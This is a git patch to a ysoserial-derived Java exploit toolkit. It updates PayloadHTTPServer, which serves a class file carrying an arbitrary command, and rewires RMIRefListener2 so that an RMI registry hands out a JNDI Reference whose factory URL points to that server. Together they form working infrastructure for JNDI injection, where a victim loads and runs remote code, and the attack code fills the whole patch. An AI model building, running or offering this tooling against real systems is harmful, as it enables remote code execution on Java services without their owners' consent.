From bf95d4aa3ae7291a811da4777c4db8c06c7d3553 Mon Sep 17 00:00:00 2001 From: wh1t3P1g Date: Wed, 5 Feb 2020 21:12:20 +0800 Subject: [PATCH] update RMIRefListener2 --- .../ysoserial/exploit/PayloadHTTPServer.java | 22 ++++++++++-- .../ysoserial/exploit/RMIRefListener2.java | 35 ++++++++++--------- 2 files changed, 37 insertions(+), 20 deletions(-) diff --git a/src/main/java/ysoserial/exploit/PayloadHTTPServer.java b/src/main/java/ysoserial/exploit/PayloadHTTPServer.java index b6d55e8c..5b3090f9 100644 --- a/src/main/java/ysoserial/exploit/PayloadHTTPServer.java +++ b/src/main/java/ysoserial/exploit/PayloadHTTPServer.java @@ -16,7 +16,18 @@ * @author wh1t3P1g * @since 2020/2/5 */ -public class PayloadHTTPServer { +public class PayloadHTTPServer implements Runnable{ + + private int port; + private String classname; + private String command; + private HttpServer server; + + public PayloadHTTPServer(int port, String classname, String command) { + this.port = port; + this.classname = classname; + this.command = command; + } public static void main(String[] args) { if ( args.length < 3 ) { @@ -29,9 +40,14 @@ public static void main(String[] args) { String classname = args[1]; String command = args[2]; + PayloadHTTPServer server = new PayloadHTTPServer(port, classname, command); + server.run(); + } + + public void run(){ try { System.err.println("* Opening Payload HTTPServer on " + port); - HttpServer server = HttpServer.create(new InetSocketAddress(port), 0); + server = HttpServer.create(new InetSocketAddress(port), 0); server.createContext("/"+classname+".class", new PayloadHandler(classname, command)); server.setExecutor(null); server.start(); @@ -71,7 +87,7 @@ private void generate() throws Exception { @Override public void handle(HttpExchange exchange) throws IOException { - System.err.println("Have connection from "+exchange.getRemoteAddress()); + System.err.println("Have request from "+exchange.getRemoteAddress()); System.err.println("Get request <"+exchange.getRequestMethod()+"> "+exchange.getRequestURI()); exchange.sendResponseHeaders(200, obj.length); OutputStream os = exchange.getResponseBody(); diff --git a/src/main/java/ysoserial/exploit/RMIRefListener2.java b/src/main/java/ysoserial/exploit/RMIRefListener2.java index d1e18bdf..c9f86e5d 100644 --- a/src/main/java/ysoserial/exploit/RMIRefListener2.java +++ b/src/main/java/ysoserial/exploit/RMIRefListener2.java @@ -9,16 +9,6 @@ import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; - -/** - * Generic JRMP listener - * - * Opens up an JRMP listener that will deliver the specified payload to any - * client connecting to it and making a call. - * - * @author mbechler - * - */ @SuppressWarnings ( { "restriction" } ) @@ -39,20 +29,31 @@ public RMIRefListener2(int port, String factoryName, String factoryURL, Object p public static final void main ( final String[] args ) throws Exception{ - if ( args.length < 3 ) { - System.err.println(RMIRefListener2.class.getName() + " "); + if ( args.length < 4 ) { + System.err.println(RMIRefListener2.class.getName() + " "); System.exit(-1); return; } - Reference reference = new Reference(args[ 1 ],args[ 1 ],args[ 2 ]); + String[] registry = args[0].split(":"); + int registryPort = Integer.parseInt(registry[1]); + String host = registry[0]; + + int httpServerPort = Integer.parseInt(args[1]); + String factoryName = args[2]; + String factoryURL = "http://"+host+":"+httpServerPort+"/"; + String command = args[3]; + + Reference reference = new Reference(factoryName, factoryName, factoryURL); final Object payloadObject = new ReferenceWrapper(reference); try { - int port = Integer.parseInt(args[ 0 ]); - System.err.println("* Opening JRMP listener on " + port); - System.err.println("* URL: rmi://some-host:"+port+"/"+args[1]); - RMIRefListener2 c = new RMIRefListener2(port, args[1], args[2], payloadObject); + PayloadHTTPServer server = new PayloadHTTPServer(httpServerPort, factoryName, command); + server.run(); + System.err.println("* Opening JRMP listener on " + registryPort); + System.err.println("* URL: rmi://"+host+":"+registryPort+"/"+factoryName); + System.err.println("* FactoryURL: "+factoryURL); + RMIRefListener c = new RMIRefListener(registryPort, payloadObject); c.run(); } catch ( Exception e ) {